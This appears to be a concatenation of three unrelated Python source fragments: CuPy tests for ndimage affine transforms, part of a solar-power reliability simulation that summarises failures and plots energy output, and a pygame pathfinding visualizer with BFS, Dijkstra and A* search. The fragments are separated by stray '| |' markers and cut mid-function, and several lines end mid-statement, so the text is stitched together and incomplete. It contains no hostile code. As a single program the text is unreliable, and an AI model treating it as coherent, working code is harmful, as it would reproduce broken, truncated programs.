map_coordinates = scp.ndimage.map_coordinates
return map_coordinates(a, coordinates, None, self.order, self.mode)
@testing.for_float_dtypes(no_float16=True)
@testing.numpy_cupy_allclose(atol=1e-4, scipy_name='scp')
def test_map_coordinates_float(self, xp, scp, dtype):
# Half integer coordinate rounding test case from:
# https://github.com/cupy/cupy/issues/4550
a = testing.shaped_arange((4, 3), xp, dtype)
coordinates = xp.array([[0.5, 2], [0.5, 1]])
return self._map_coordinates(xp, scp, a, coordinates)
@testing.parameterize(*testing.product({
'matrix_shape': [(2,), (2, 2), (2, 3), (3, 3)],
'offset': [0.3, [-1.3, 1.3]],
'output_shape': [None],
'output': [None, numpy.float64, 'empty'],
'order': [0, 1, 2, 3, 4, 5],
'mode': legacy_modes + scipy16_modes,
'cval': [1.0],
'prefilter': [False, True],
}))
@testing.gpu
@testing.with_requires('scipy')
class TestAffineTransform:
_multiprocess_can_split = True
def _affine_transform(self, xp, scp, a, matrix):
_conditional_scipy_version_skip(self.mode, self.order)
ver = numpy.lib.NumpyVersion(scipy.__version__)
if ver < '1.0.0' and matrix.ndim == 2 and matrix.shape[1] == 3:
return xp.empty(0)
if matrix.shape == (3, 3):
matrix[-1, 0:-1] = 0
matrix[-1, -1] = 1
affine_transform = scp.ndimage.affine_transform
if self.output == 'empty':
output = xp.empty_like(a)
return_value = affine_transform(a, matrix, self.offset,
self.output_shape, output,
self.order, self.mode, self.cval,
self.prefilter)
assert return_value is None or return_value is output
return output
else:
return affine_transform(a, matrix, self.offset, self.output_shape,
self.output, self.order, self.mode,
self.cval, self.prefilter)
@testing.for_float_dtypes(no_float16=True)
@testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
def test_affine_transform_float(self, xp, scp, dtype):
a = testing.shaped_random((100, 100), xp, dtype)
matrix = testing.shaped_random(self.matrix_shape, xp, dtype)
return self._affine_transform(xp, scp, a, matrix)
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
@testing.with_requires('scipy>=1.6.0')
def test_affine_transform_complex_float(self, xp, scp, dtype):
if self.output == numpy.float64:
# must promote output to a complex dtype
self.output = numpy.complex128
a = testing.shaped_random((100, 100), xp, dtype)
matrix = testing.shaped_random(self.matrix_shape, xp, xp.float64)
return self._affine_transform(xp, scp, a, matrix)
@testing.for_float_dtypes(no_float16=True)
@testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
def test_affine_transform_fortran_order(self, xp, scp, dtype):
a = testing.shaped_random((100, 100), xp, dtype)
a = xp.asfortranarray(a)
matrix = testing.shaped_random(self.matrix_shape, xp, dtype)
matrix = xp.asfortranarray(matrix)
return self._affine_transform(xp, scp, a, matrix)
def _hip_skip_invalid_condition(self):
if (runtime.is_hip
and self.matrix_shape in [(2,), (2, 2)]
and self.order in [2, 3, 4, 5]
and self.output in [None, 'empty']
and self.prefilter):
pytest.xfail('ROCm/HIP may have a bug')
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_allclose(atol=1e-5, scipy_name='scp')
def test_affine_transform_int(self, xp, scp, dtype):
self._hip_skip_invalid_condition()
if numpy.lib.NumpyVersion(scipy.__version__) < '1.0.0':
if dtype in (numpy.dtype('l'), numpy.dtype('q')):
dtype = numpy.int64
elif dtype in (numpy.dtype('L'), numpy.dtype('Q')):
dtype = numpy.uint64
a = testing.shaped_random((100, 100), xp, dtype)
matrix = testing.shaped_random(self.matrix_shape, xp, dtype)
out = self._affine_transform(xp, scp, a, matrix)
float_out = self._affine_transform(xp, scp, a.astype(xp.float64),
matrix) % 1
half = xp.full_like(float_out, 0.5)
out[xp.isclose(float_out, half, atol=1e-5)] = 0
return out
@testing.gpu
@testing.with_requires('scipy')
class TestAffineExceptions:
def test_invalid_affine_ndim(self):
ndimage_modules = (scipy.ndimage, cupyx.scipy.ndimage)
for (xp, ndi) in zip((numpy, cupy), ndimage_modules):
x = xp.ones((8, 8, 8))
with pytest.raises(RuntimeError):
ndi.affine_transform(x, xp.ones((3, 3, 3)))
with pytest.raises(RuntimeError):
ndi.affine_transform(x, xp.ones(()))
def test_invalid_affine_shape(self):
ndimage_modules = (scipy.ndimage, cupyx.scipy.ndimage)
for (xp, ndi) in zip((numpy, cupy), ndimage_modules):
x = xp.ones((8, 8, 8))
with pytest.raises(RuntimeError):
ndi.affine_transform(x, xp.ones((0, 3)))
with pytest.raises(RuntimeError):
ndi.affine_transform(x, xp.eye(x.ndim - 1))
with pytest.raises(RuntimeError):
ndi.affine_transform(x, xp.eye(x.ndim + 2))
with pytest.raises(RuntimeError):
ndi.affine_transform(x, xp.eye(x.ndim)[:, :-1])
@testing.with_requires('scipy>=1.6.0')
def test_invalid_output_dtype(self):
# real output array with complex input is not allowed
ndimage_modules = (scipy.ndimage, cupyx.scipy.ndimage)
for (xp, ndi) in zip((numpy, cupy), ndimage_modules):
x = xp.ones((8, 8, 8), dtype=numpy.complex128)
output = xp.ones_like(x, dtype=x.real.dtype)
with pytest.raises(RuntimeError):
ndi.affine_transform(x, xp.ones((0, 3)), output=output)
def test_invalid_texture_arguments(self):
if runtime.is_hip:
pytest.skip('texture memory not supported yet')
aft = cupyx.scipy.ndimage.affine_transform
x = [cupy.ones((8, ) * n, dtype=cupy.float32) for n in range(1, 5)]
# (ndim < 2) and (ndim > 3) must fail
for i in [0, 3]:
with pytest.raises(ValueError):
aft(x[i], cupy.eye(i + 1, dtype=cupy.float32),
texture_memory=True)
# wrong input dtype
for dt in [cupy.float16, cupy.float64, cupy.int32, cupy.int64]:
with pytest.raises(ValueError):
aft(cupy.ones((8, 8), dtype=dt),
cupy.eye(3, dtype=cupy.float32), texture_memory=True)
# wrong matrix shape
for i in range(len(x)):
with pytest.raises(ValueError):
aft(x[i], cupy.eye(i, dtype=cupy.float32),
texture_memory=True)
# wrong output
with pytest.raises(ValueError):
aft(x[2], cupy.eye(3, dtype=cupy.float32), output='wrong',
texture_memory=True)
# wrong mode
for m in ['mirror', 'reflect', 'wrap', 'grid-mirror',
'grid-wrap', 'grid-constant', 'opencv']:
with pytest.raises(ValueError):
aft(x[2], cupy.eye(3, dtype=cupy.float32), mode=m,
texture_memory=True)
# non matching output_shape and output's shape
with pytest.raises(ValueError):
output = cupy.empty((7, 7, 7), dtype=cupy.float32)
aft(x[2], cupy.eye(3, dtype=cupy.float32), output_shape=(8, 8, 8),
output=output, texture_memory=True)
# non matching output_shape and input shape
with pytest.raises(ValueError):
aft(x[2], cupy.eye(3, dtype=cupy.float32), output_shape=(7, 7, 7),
texture_memory=True)
@pytest.mark.skipif(runtime.is_hip, reason='texture memory not supported yet')
@testing.parameterize(*testing.product({
'output': [None, numpy.float32, 'empty'],
'output_shape': [None, 10],
'order': [0, 1],
'mode': ['constant', 'nearest'],
'shape': [(100, 100), (10, 20), (10, 10, 10), (10, 20, 30)],
'theta': [0, 90, 180, 270]
}))
@testing.gpu
@testing.with_requires('scipy')
class TestAffineTransformTextureMemory:
_multiprocess_can_split = True
def _2d_rotation_matrix(self, theta, rotation_center):
import scipy.special
c, s = scipy.special.cosdg(theta), scipy.special.sindg(theta)
m = numpy.array([
[1, 0, rotation_center[0]],
[0, 1, rotation_center[1]],
[0, 0, 1]
], numpy.float32)
m = numpy.dot(m, numpy.array([
[c, -s, 0],
[s, c, 0],
[0, 0, 1]
], numpy.float32))
m = numpy.dot(m, numpy.array([
[1, 0, -rotation_center[0]],
[0, 1, -rotation_center[1]],
[0, 0, 1]
], numpy.float32))
return m
def _3d_rotation_matrix(self, theta, rotation_center):
c, s = scipy.special.cosdg(theta), scipy.special.sindg(theta)
m = numpy.array([
[1, 0, 0, rotation_center[0]],
[0, 1, 0, rotation_center[1]],
[0, 0, 1, rotation_center[2]],
[0, 0, 0, 1]
], numpy.float32)
m = numpy.dot(m, numpy.array([
[1, 0, 0, 0],
[0, c, -s, 0],
[0, s, c, 0],
[0, 0, 0, 1]
], numpy.float32))
m = numpy.dot(m, numpy.array([
[1, 0, 0, -rotation_center[0]],
[0, 1, 0, -rotation_center[1]],
[0, 0, 1, -rotation_center[2]],
[0, 0, 0, 1]
], numpy.float32))
return m
@testing.numpy_cupy_allclose(atol=0.1, scipy_name='scp')
def test_affine_transform_texture_memory(self, xp, scp):
a = xp.ones(self.shape, dtype=xp.float32)
center = numpy.divide(numpy.subtract(self.shape, 1), 2)
if len(self.shape) == 2:
matrix = self._2d_rotation_matrix(self.theta, center)
elif len(self.shape) == 3:
matrix = self._3d_rotation_matrix(self.theta, center)
else:
return pytest.xfail('Unsupported shape')
if self.output == 'empty':
output = xp.empty(self.shape, dtype=xp.float32)
if self.output_shape:
return pytest.skip('This combination is tested in '
'test_invalid_texture_arguments')
else:
output = self.output
if self.output_shape:
output_shape = (self.output_shape, ) * len(self.shape)
else:
output_shape = self.output_shape
if xp == cupy:
m = cupyx.scipy.ndimage.affine_transform
matrix = cupy.array(matrix)
return m(a, matrix, output_shape=output_shape,
output=output, order=self.order,
mode=self.mode, texture_memory=True)
else:
m = scp.ndimage.affine_transform
return m(a, matrix, output_shape=output_shape,
output=output, order=self.order,
mode=self.mode)
@testing.gpu
@testing.with_requires('opencv-python')
class TestAffineTransformOpenCV:
_multiprocess_can_split = True
@testing.for_float_dtypes(no_float16=True)
# The precision of cv2.warpAffine is not good because it uses fixed-point
# arithmetic.
@testing.numpy_cupy_allclose(atol=0.2)
| |
failures
for fail in case.config[c].get(ck.PARTIAL_FAIL, {}).keys():
if f"{c}_failures_by_type_{fail}" not in summary_data:
summary_data[f"{c}_failures_by_type_{fail}"] = [None]
summary_data[f"{c}_failures_by_type_{fail}"] += [comp.comps[c][f"failure_by_type_{fail}"].sum()]
# if the component had no failures, set everything here and continue
if sum_fails == 0:
summary_data[f"{c}_mtbf"] += [lifetime * 365]
summary_data[f"{c}_mttr"] += [0]
summary_data[f"{c}_mttd"] += [0]
else:
# mean time between failure
summary_data[f"{c}_mtbf"] += [lifetime * 365 * case.config[c][ck.NUM_COMPONENT] / sum_fails]
# mean time to repair
if case.config[c][ck.CAN_REPAIR]:
# take the number of fails minus whatever components have not been repaired by the end of the simulation to get the number of repairs
sum_repairs = sum_fails - len(comp.comps[c].loc[(comp.comps[c]["state"] == 0)])
if sum_repairs > 0:
summary_data[f"{c}_mttr"] += [comp.total_repair_time[c] / sum_repairs]
else:
summary_data[f"{c}_mttr"] += [0]
else:
summary_data[f"{c}_mttr"] += [0]
# mean time to detection (mean time to acknowledge)
if (
case.config[c][ck.CAN_MONITOR]
or case.config[c].get(ck.COMP_MONITOR, None)
or case.config[c].get(ck.INDEP_MONITOR, None)
):
# take the number of fails minus the components that have not been repaired and also not be detected by monitoring
mask = (comp.comps[c]["state"] == 0) & (comp.comps[c]["time_to_detection"] > 1)
sum_monitor = sum_fails - len(comp.comps[c].loc[mask])
if sum_monitor > 0:
summary_data[f"{c}_mttd"] += [comp.total_monitor_time[c] / sum_monitor]
else:
summary_data[f"{c}_mttd"] += [0]
else:
summary_data[f"{c}_mttd"] += [0]
else:
# mean time between failure
summary_data[f"{c}_total_failures"] += [0]
summary_data[f"{c}_mtbf"] += [lifetime * 365]
summary_data[f"{c}_mttr"] += [0]
summary_data[f"{c}_mttd"] += [0]
# availability
if f"{c}_availability" not in summary_data:
summary_data[f"{c}_availability"] = [None]
summary_data[f"{c}_availability"] += [
(
1
- (comp.comps[c]["avail_downtime"].sum() / (lifetime * case.annual_daylight_hours))
/ case.config[c][ck.NUM_COMPONENT]
)
]
# generate dataframes
summary_results = pd.DataFrame(index=summary_index, data=summary_data)
summary_results.index.name = "Realization"
# reorder columns for summary results
reorder = list(summary_results.columns[0:2]) # lcoe and npv
reorder += list(summary_results.columns[lifetime * 3 + 2 :]) # failures and avail
reorder += list(summary_results.columns[2 : lifetime * 3 + 2]) # energy
summary_results = summary_results[reorder]
degradation_results = pd.DataFrame(index=day_index, data=degradation_data)
dc_power_results = pd.DataFrame(index=timeseries_index, data=timeseries_dc_data)
ac_power_results = pd.DataFrame(index=timeseries_index, data=timeseries_ac_data)
dc_power_results.index.name = "Hour"
ac_power_results.index.name = "Hour"
degradation_results.index.name = "Day"
cost_index = pd.MultiIndex.from_product([yearly_cost_index, year_index], names=["Realization", "Year"])
yearly_cost_results = pd.DataFrame(index=cost_index, data=yearly_cost_data)
yearly_cost_results["total"] = yearly_cost_results.sum(axis=1)
# fails per year, same multi index as cost
yearly_fail_results = pd.DataFrame(index=cost_index, data=yearly_fail_data)
yearly_fail_results["total"] = yearly_fail_results.sum(axis=1)
stats_append = []
summary_no_base = summary_results.iloc[1:]
min = summary_no_base.min()
min.name = "min"
stats_append.append(min)
max = summary_no_base.max()
max.name = "max"
stats_append.append(max)
mean = summary_no_base.mean()
mean.name = "mean"
stats_append.append(mean)
median = summary_no_base.median()
median.name = "median"
stats_append.append(median)
std = summary_no_base.std()
std.name = "stddev"
stats_append.append(std)
conf_interval = case.config[ck.CONF_INTERVAL]
conf_int = cf_interval(1 - (conf_interval / 100), std, case.config[ck.NUM_REALIZATION])
lower_conf = mean - conf_int
lower_conf.name = f"{conf_interval}% lower confidence interval of mean"
stats_append.append(lower_conf)
upper_conf = mean + conf_int
upper_conf.name = f"{conf_interval}% upper confidence interval of mean"
stats_append.append(upper_conf)
# p test, which is using the ppf of the normal distribituion with our calculated mean and std. We use scipy's functions for this
# see https://help.helioscope.com/article/141-creating-a-p50-and-p90-with-helioscope
for p in p_vals:
values = []
# calculate the p value for every column
for m, s in zip(mean, std):
if s != 0: # for columns with no STDDEV
values.append(stats.norm.ppf((1 - p / 100), loc=m, scale=s))
else:
values.append(None)
# save results
values = pd.Series(values, index=mean.index)
values.name = f"P{p}"
stats_append.append(values)
# since pandas wants to depercate append, gotta convert series into dataframes
summary_results = pd.concat([summary_results, *[s.to_frame().transpose() for s in stats_append]])
return [
summary_results,
degradation_results,
dc_power_results,
ac_power_results,
yearly_cost_results,
yearly_fail_results,
]
def graph_results(case: SamCase, results: List[Components], save_path: str = None) -> None:
"""
Generate graphs from a list of Component objects from each realization
Args:
case (:obj:`SamCase`): The loaded and verified case to use with the simulation
results (:obj:`list(Components)`): List of component objects that contain the results for each realization
save_path (str, Optional): Path to save graphs to, if provided
"""
lifetime = case.config[ck.LIFETIME_YRS]
colors = [
"r",
"g",
"b",
"c",
"m",
"y",
"k",
"tab:orange",
"tab:brown",
"lime",
"tab:gray",
"indigo",
"navy",
"pink",
"coral",
"yellow",
"teal",
"fuchsia",
"palegoldenrod",
"darkgreen",
]
# base case data to compare to
base_losses = case.base_losses
base_load = np.array(case.base_load) if case.base_load is not None else None
base_ac_energy = np.array(case.base_ac_energy)
base_annual_energy = np.array(case.base_annual_energy)
base_tax_cash_flow = np.array(case.base_tax_cash_flow)
# parse data
avg_ac_energy = np.zeros(len(case.base_ac_energy)) # since length is variable based on frequency of weather file
avg_annual_energy = np.zeros(lifetime)
avg_losses = np.zeros(len(ck.losses))
avg_tax_cash_flow = np.zeros(lifetime + 1) # add 1 for year 0
avg_failures = np.zeros((len(ck.component_keys), lifetime * 365)) # 7 types of components
# computing the average across every realization
for comp in results:
avg_ac_energy += np.array(comp.timeseries_ac_power)
avg_annual_energy += np.array(comp.annual_energy)
avg_losses += np.array(list(comp.losses.values()))
avg_tax_cash_flow += np.array(comp.tax_cash_flow)
for i, c in enumerate(ck.component_keys):
if not case.config.get(c, None):
continue
for f in comp.summarize_failures(c).values():
avg_failures[i] += f
# monthly and annual energy
avg_ac_energy /= len(results)
avg_annual_energy /= len(results)
avg_losses /= len(results)
avg_tax_cash_flow /= len(results)
avg_failures /= len(results)
# sum up failures to be per year
avg_failures = np.sum(np.reshape(avg_failures, (len(ck.component_keys), lifetime, 365)), axis=2)
# determine the frequency of the data, same as frequncy of supplied weather file
total = int(len(avg_ac_energy) / lifetime)
if total == 8760:
freq = 1
else:
freq = 0
while total > 8760:
freq += 1
total /= freq
avg_ac_energy = np.reshape(avg_ac_energy[0::freq], (lifetime, 8760)) # yearly energy by hour
avg_ac_energy = np.sum(avg_ac_energy, axis=0) / lifetime # yearly energy average
avg_ac_energy = np.reshape(avg_ac_energy, (365, 24)) # day energy by hour
avg_day_energy_by_hour = avg_ac_energy.copy() # copy for heatmap yearly energy generation
avg_ac_energy = np.sum(avg_ac_energy, axis=1) # energy per day
base_ac_energy = np.reshape(base_ac_energy[0::freq], (lifetime, 8760))
base_ac_energy = np.sum(base_ac_energy, axis=0) / lifetime
base_ac_energy = np.reshape(base_ac_energy, (365, 24))
base_day_energy_by_hour = base_ac_energy.copy() # copy for heatmap yearly energy generation
base_ac_energy = np.sum(base_ac_energy, axis=1)
# daily load, load is the same between realizations and base
if base_load is not None:
base_load = np.reshape(base_load, (365, 24))
base_load = np.sum(base_load, axis=1)
avg_losses = {k: v for k, v in zip(ck.losses, avg_losses)} # create losses dictionary
# calculate per month energy averaged across every year on every realization
current_month = datetime(datetime.utcnow().year, 1, 1)
# relative deltas allow dynamic month lengths such that each month has the proper number of days
delta = relativedelta(months=1)
start = 0
monthly_energy = {}
monthly_load = {}
base_monthly_energy = {}
for _ in range(12):
month = current_month.strftime("%b")
num_days = ((current_month + delta) - current_month).days # number of days in this month
monthly_energy[month] = np.sum(avg_ac_energy[start : start + num_days])
base_monthly_energy[month] = np.sum(base_ac_energy[start : start + num_days])
if base_load is not None:
monthly_load[month] = np.sum(base_load[start : start + num_days])
current_month += delta
start += num_days
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
fig.set_figheight(5)
fig.set_figwidth(10)
ax1.bar(list(monthly_energy.keys()), list(monthly_energy.values()))
ax1.set_title("Realization Average")
ax1.set_xlabel("Month")
ax1.set_ylabel("kWh")
ax2.bar(list(monthly_energy.keys()), list(base_monthly_energy.values()))
ax2.set_title("Base Case")
ax2.set_xlabel("Month")
ax2.set_ylabel("kWh")
fig.suptitle("Monthly Energy Production")
fig.tight_layout()
if save_path:
plt.savefig(os.path.join(save_path, "Average Monthly Energy Production.png"), bbox_inches="tight", dpi=200)
else:
plt.show()
plt.close() # clear plot
# graph the monthly energy against the monthly load
if base_load is not None:
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
fig.set_figheight(5)
fig.set_figwidth(10)
ind = np.arange(len(monthly_energy))
ax1.bar(ind - 0.2, list(monthly_energy.values()), width=0.4, label="AC Energy")
ax1.bar(ind + 0.2, list(monthly_load.values()), width=0.4, color="tab:gray", label="Electricity Load")
ax1.set_title("Realization Average")
ax1.set_xlabel("Month")
ax1.set_xticks(ind)
ax1.set_xticklabels(labels=list(monthly_energy.keys()))
ax1.set_ylabel("kWh")
ax2.bar(ind - 0.2, list(base_monthly_energy.values()), width=0.4)
ax2.bar(ind + 0.2, list(monthly_load.values()), width=0.4, color="tab:gray")
ax2.set_title("Base Case")
ax2.set_xlabel("Month")
ax2.set_xticks(ind)
ax2.set_xticklabels(labels=list(monthly_energy.keys()))
ax2.set_ylabel("kWh")
fig.legend()
fig.suptitle("Monthly Energy and Load")
fig.tight_layout()
if save_path:
plt.savefig(os.path.join(save_path, "Average Monthly Energy and Load.png"), bbox_inches="tight", dpi=200)
else:
plt.show()
plt.close() # clear plot
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
fig.set_figheight(5)
fig.set_figwidth(10)
# add 1 to have years 1->25
ax1.bar(np.arange(lifetime) + 1, avg_annual_energy)
ax1.set_title("Realization Average")
ax1.set_xlabel("Year")
ax1.set_ylabel("kWh")
ax2.bar(np.arange(lifetime) + 1, base_annual_energy)
ax2.set_title("Base Case")
ax2.set_xlabel("Year")
ax2.set_ylabel("kWh")
fig.suptitle("Annual Energy Production")
fig.tight_layout()
if save_path:
plt.savefig(os.path.join(save_path, "Average Annual Energy Production.png"), bbox_inches="tight", dpi=200)
else:
plt.show()
plt.close() # clear plot
# this helper function just makes it easier since the base case requires this as well
def gen_loss_data(losses):
# losses
loss_data = {
"POA front-side shading loss": losses["annual_poa_shading_loss_percent"],
"POA front-side soiling loss": losses["annual_poa_soiling_loss_percent"],
"POA front-side reflection (IAM) loss": losses["annual_poa_cover_loss_percent"],
"DC module deviation from STC": losses["annual_dc_module_loss_percent"],
"DC inverter MPPT clipping loss": losses["annual_dc_mppt_clip_loss_percent"],
"DC mismatch loss": losses["annual_dc_mismatch_loss_percent"],
"DC diodes and connections loss": losses["annual_dc_diodes_loss_percent"],
"DC wiring loss": losses["annual_dc_wiring_loss_percent"],
"DC tracking loss": losses["annual_dc_tracking_loss_percent"],
"DC nameplate loss": losses["annual_dc_nameplate_loss_percent"],
"DC power optimizer loss": losses["annual_dc_optimizer_loss_percent"],
"DC performance adjustment loss": losses["annual_dc_perf_adj_loss_percent"],
"AC inverter power clipping loss": losses["annual_ac_inv_clip_loss_percent"],
"AC inverter | |
""" Pathfinding Visualizer Made by <NAME> """
import pygame
from tkinter import messagebox, Tk
from queue import PriorityQueue
import os
from Colours import Colours
from Grid import Grid
import pygame_menu
import time
from playsound import playsound
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (350, 50) # open window in the middle of the screen
icon = pygame.image.load('images/location.png')
WIDTH = 600
ROWS = 25
grid = Grid()
colour = Colours()
# Main Visualizer Controller
def visualize(width, ROWS, twoDestinations):
playsound('sounds/buttonClicked.mp3')
map = grid.createGrid(ROWS, width)
pygame.display.set_caption("Pathfinding Visualizer")
pygame.display.set_icon(icon)
window = pygame.display.set_mode((WIDTH, WIDTH))
pygame.display.update()
source = None
destination = None
destination2 = None
exit = False
while not exit:
grid.colour(window, map, ROWS, width)
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit = True
if pygame.mouse.get_pressed()[0]:
position = pygame.mouse.get_pos()
row, column = grid.getClicked(position, ROWS, width)
vertex = map[row][column]
if not source and vertex != destination:
source = vertex
source.setSource()
elif not destination and vertex != source:
destination = vertex
destination.setDestination()
elif twoDestinations and not destination2 and vertex != source and vertex != destination:
destination2 = vertex
destination2.setDestination()
elif vertex != destination and vertex != source and vertex != destination2:
vertex.setObstacle()
elif pygame.mouse.get_pressed()[2]: # RIGHT
position = pygame.mouse.get_pos()
row, column = grid.getClicked(position, ROWS, width)
vertex = map[row][column]
vertex.clear()
if vertex == source:
source = None
elif vertex == destination:
destination = None
elif vertex == destination2:
destination2 = None
if event.type == pygame.KEYDOWN:
if source and destination:
if event.key == pygame.K_1:
map = setGameBoard(map)
grid.colour(window, map, ROWS, width)
pygame.display.update()
if not twoDestinations:
breadthFirstSearch(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
elif destination2:
twoDestinationBFS(lambda: grid.colour(window, map, ROWS, width), source, destination,
destination2, map)
elif event.key == pygame.K_2:
map = setGameBoard(map)
grid.colour(window, map, ROWS, width)
pygame.display.update()
if not twoDestinations:
dijkstrasAlgorithm(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
elif destination2:
dijkstraTwoDestinations(lambda: grid.colour(window, map, ROWS, width), source, destination,
destination2, map)
elif event.key == pygame.K_3 and not twoDestinations:
map = setGameBoard(map)
grid.colour(window, map, ROWS, width)
pygame.display.update()
AStarAlgorithm(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
elif event.key == pygame.K_4 and not twoDestinations:
map = setGameBoard(map)
grid.colour(window, map, ROWS, width)
pygame.display.update()
BFSBiDirectional(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
elif event.key == pygame.K_5 and not twoDestinations:
map = setGameBoard(map)
grid.colour(window, map, ROWS, width)
pygame.display.update()
dijkstraBiDirectional(lambda: grid.colour(window, map, ROWS, width), source, destination, map)
def setGameBoard(map):
for row in map:
for vertex in row:
if not vertex.isSource() and not vertex.isDestination() and not vertex.isObstacle():
vertex.clear()
vertex.addConnections(map)
return map
""" Base Pathfinding Algorithms"""
def breadthFirstSearch(drawing, source, destination, map):
queue = [source]
parent = {}
shortest = {vertex: float("inf") for row in map for vertex in row}
shortest[source] = 0
found = False
startTime = time.time()
while len(queue) != 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
current = queue.pop(0)
# Path Found
if current == destination:
totalTime = time.time() - startTime
distanceCovered = reconstructPath(parent, destination, drawing, source)
destination.setDestination()
message = " Speed: {totalTime:.1f}s Distance Covered: {distance}"
Tk().wm_withdraw()
messagebox.showinfo("Path Found!!", message.format(totalTime=totalTime, distance=distanceCovered))
return True
# loop through the current vertex's connections
for edge in current.connections:
tempScore = shortest[current] + 1
if tempScore < shortest[edge]:
parent[edge] = current
shortest[edge] = tempScore
if edge not in queue and edge != source:
queue.append(edge)
if not edge.isVisited():
edge.setInQueue()
drawing()
if current != source:
current.setAsVisited()
# No Solution Case
if not found:
Tk().wm_withdraw()
messagebox.showinfo("No Solution", "There was no solution")
def dijkstrasAlgorithm(drawing, source, destination, map):
count = 0
found = False
queue = PriorityQueue()
queue.put((0, count, source))
parent = {}
gScore = {vertex: float("inf") for row in map for vertex in row} # shortest distance between source and current Node
gScore[source] = 0
queueDict = {source}
startTime = time.time()
while not queue.empty():
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
current = queue.get()[2]
queueDict.remove(current)
if current == destination:
timeTaken = time.time() - startTime
distanceCovered = reconstructPath(parent, destination, drawing, source)
destination.setDestination()
message = " Speed: {timeTaken:.1f}s Distance Covered: {distance}"
Tk().wm_withdraw()
messagebox.showinfo("Path Found!!", message.format(timeTaken=timeTaken, distance=distanceCovered))
return True
for edge in current.connections:
temp = gScore[current] + edge.getWeight()
if temp < gScore[edge]:
parent[edge] = current
gScore[edge] = temp
if edge not in queueDict:
count += 1
queue.put((gScore[edge], count, edge))
queueDict.add(edge)
edge.setInQueue()
drawing()
if current != source:
current.setAsVisited()
if not found:
Tk().wm_withdraw()
messagebox.showinfo("No Solution", "There was no solution")
def heuristic(currentPosition, destinationPosition): # Estimate distance and position of destination from current vertex
xAxisSource, yAxisSource = currentPosition
xAxisDestination, yAxisDestination = destinationPosition
return abs(xAxisSource - xAxisDestination) + abs(yAxisSource - yAxisDestination)
def AStarAlgorithm(drawing, source, destination, map):
count = 0
found = False
openSet= PriorityQueue()
openSet.put((0, count, source))
parent = {}
gScore = {vertex: float("inf") for row in map for vertex in row} # shortest distance between source and current vertex
gScore[source] = 0
fScore = {vertex: float("inf") for row in map for vertex in row} # gScore + heuristic
fScore[source] = heuristic(source.getPosition(), destination.getPosition())
openSetHash = {source}
startTime = time.time()
while not openSet.empty():
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
current = openSet.get()[2]
openSetHash.remove(current)
if current == destination:
timeTaken = time.time() - startTime
distanceCovered = reconstructPath(parent, destination, drawing, source)
destination.setDestination()
message = " Speed: {timeTaken:.1f}s Distance Covered: {distance}"
Tk().wm_withdraw()
messagebox.showinfo("Path Found!!", message.format(timeTaken=timeTaken, distance=distanceCovered))
return True
for edge in current.connections:
temp = gScore[current] + edge.getWeight()
if temp < gScore[edge]:
parent[edge] = current
gScore[edge] = temp
fScore[edge] = temp + heuristic(edge.getPosition(), destination.getPosition())
if edge not in openSetHash:
count += 1
openSet.put((fScore[edge], count, edge))
openSetHash.add(edge)
edge.setInQueue()
drawing()
if current != source:
current.setAsVisited()
if not found:
Tk().wm_withdraw()
messagebox.showinfo("No Solution", "There was no solution")
""" Functions for Reconstructing Paths """
# Reconstruct Path
def reconstructPath(parent, vertex, draw, source):
distanceCovered = 0
vertex.setDestination()
# loop through the vertices' parents, making a path from the destination to the source
while vertex in parent:
time.sleep(0.025)
distanceCovered += vertex.getWeight()
vertex = parent[vertex]
if vertex.isDestination() or vertex.isSource():
pass
else:
vertex.setPathVertex()
draw()
if vertex == source:
playsound('sounds/success.mp3')
return distanceCovered
# Reconstruct a Path from bi-directional algorithm
def reconstructdirectionalPath(sourceParent, destParent, sourceCurrent, drawing, source):
current = sourceCurrent
distanceCovered = 0
# loop through the vertices' parents, making a path from the current vertex to the source
while sourceCurrent in sourceParent:
distanceCovered += sourceCurrent.getWeight()
sourceCurrent = sourceParent[sourceCurrent]
if sourceCurrent.isSource():
pass
else:
sourceCurrent.setPathVertex()
time.sleep(0.025)
drawing()
if sourceCurrent.isDestination():
sourceCurrent.setDestination()
current.setPathVertex()
# loop through the vertices' parents, making a path from the current vertex to the destination
while current in destParent:
distanceCovered += current.getWeight()
current = destParent[current]
if current.isSource():
pass
else:
time.sleep(0.025)
if current.isDestination():
pass
else:
current.setPathVertex()
drawing()
if current.isDestination():
current.setDestination()
source.setSource()
playsound('sounds/success.mp3')
return distanceCovered
# Reconstruct a Path with Two destinations
def reconstructRoute(parent1, parent2, vertex, draw, source):
distanceCovered = 0
# loop through the vertices' parents, making a path from the current vertex to the destination
while vertex in parent2:
distanceCovered += vertex.getWeight()
vertex = parent2[vertex]
if vertex.isDestination():
pass
else:
vertex.setPathVertex()
time.sleep(0.025)
draw()
if vertex.isDestination():
vertex.setDestination()
time.sleep(0.5)
# loop through the vertices' parents, making a path from the current vertex to the source
while vertex in parent1:
distanceCovered += vertex.getWeight()
vertex = parent1[vertex]
if vertex.isSource():
pass
else:
time.sleep(0.025)
vertex.setPathVertex()
draw()
if vertex.isDestination():
vertex.setDestination()
source.setSource()
playsound('sounds/success.mp3')
message = " Distance Covered: {distance}"
Tk().wm_withdraw()
messagebox.showinfo("Path Found!!", message.format(distance=distanceCovered))
""" Bi-Directional Algorithms"""
# BFS Biderectional Search
def BFSBiDirectional(drawing, source, destination, map):
queue = [source]
destQueue = [destination]
sourceParent = {}
destParent = {}
sourceShortest = {vertex: float("inf") for row in map for vertex in row}
sourceShortest[source] = 0
destShortest = {vertex: float("inf") for row in map for vertex in row}
destShortest[destination] = 0
found = False
startTime = time.time()
while len(queue) != 0 and len(destQueue) != 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
